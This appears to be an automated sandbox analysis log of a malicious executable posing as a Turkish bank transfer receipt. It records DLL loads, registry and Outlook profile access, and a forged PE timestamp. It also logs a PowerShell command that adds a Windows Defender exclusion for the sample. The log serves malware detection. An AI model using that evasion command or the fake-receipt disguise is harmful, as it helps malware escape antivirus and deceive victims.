Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process created: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe "C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe"
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe"	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process created: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe "C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe"	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process created: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe "C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe"	Jump to behavior

Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Section loaded: edputil.dll	Jump to behavior

Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: ZBwN.pdb source: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe
Source:	Binary string: ZBwN.pdbSHA256X+ source: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe

Source: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe

Static PE information: 0xBF6B1A99 [Wed Oct 7 18:16:57 2071 UTC]

Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 0_2_06F0A63F push ss; iretd	0_2_06F0A641
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 0_2_06F0A628 push ss; iretd	0_2_06F0A638
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 0_2_06F0A61B push ss; iretd	0_2_06F0A625
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 0_2_06F0C2F1 push es; ret	0_2_06F0C300
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 0_2_06F00390 push es; ret	0_2_06F003A0
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 0_2_06F000B6 push ebx; iretd	0_2_06F000BC
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 0_2_06F00CD6 push ebx; iretd	0_2_06F00CDC
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 0_2_06F40610 push es; ret	0_2_06F40620
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 0_2_06F405C0 push es; ret	0_2_06F40620
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 0_2_06FB8510 pushad ; ret	0_2_06FB8511
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 0_2_06FBA112 push edx; iretd	0_2_06FBA115
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 0_2_06FBAAD6 pushfd ; ret	0_2_06FBAAD7
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 0_2_06FB726A push es; ret	0_2_06FB726C
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 0_2_06FB726E push es; ret	0_2_06FB7270
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 0_2_06FB7266 push es; ret	0_2_06FB7268
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 0_2_06FB723A push es; ret	0_2_06FB723C
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 0_2_06FB7226 push es; ret	0_2_06FB7238
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 0_2_06FB7212 push es; ret	0_2_06FB7214
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 0_2_06FB7216 push es; ret	0_2_06FB7220
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 0_2_06FB7216 push es; ret	0_2_06FB7224
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 0_2_06FB71E2 push es; ret	0_2_06FB7210
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 0_2_06FB71D7 push es; ret	0_2_06FB71E0
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 0_2_06FB9FDB push edx; iretd	0_2_06FB9FDD
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 0_2_06FB5B48 push es; ret	0_2_06FB5B54
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 0_2_088B1850 pushfd ; retf	0_2_088B1851
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 0_2_088BAA07 push esp; retf	0_2_088BAA09

Source: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe

Static PE information: section name: .text entropy: 7.777672430186149

Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	File created: \dekont garanti bbva_ba#u015fka bankaya transfer 01112 img .exe
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	File created: \dekont garanti bbva_ba#u015fka bankaya transfer 01112 img .exe
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	File created: \dekont garanti bbva_ba#u015fka bankaya transfer 01112 img .exe
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	File created: \dekont garanti bbva_ba#u015fka bankaya transfer 01112 img .exe	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	File created: \dekont garanti bbva_ba#u015fka bankaya transfer 01112 img .exe	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	File created: \dekont garanti bbva_ba#u015fka bankaya transfer 01112 img .exe	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
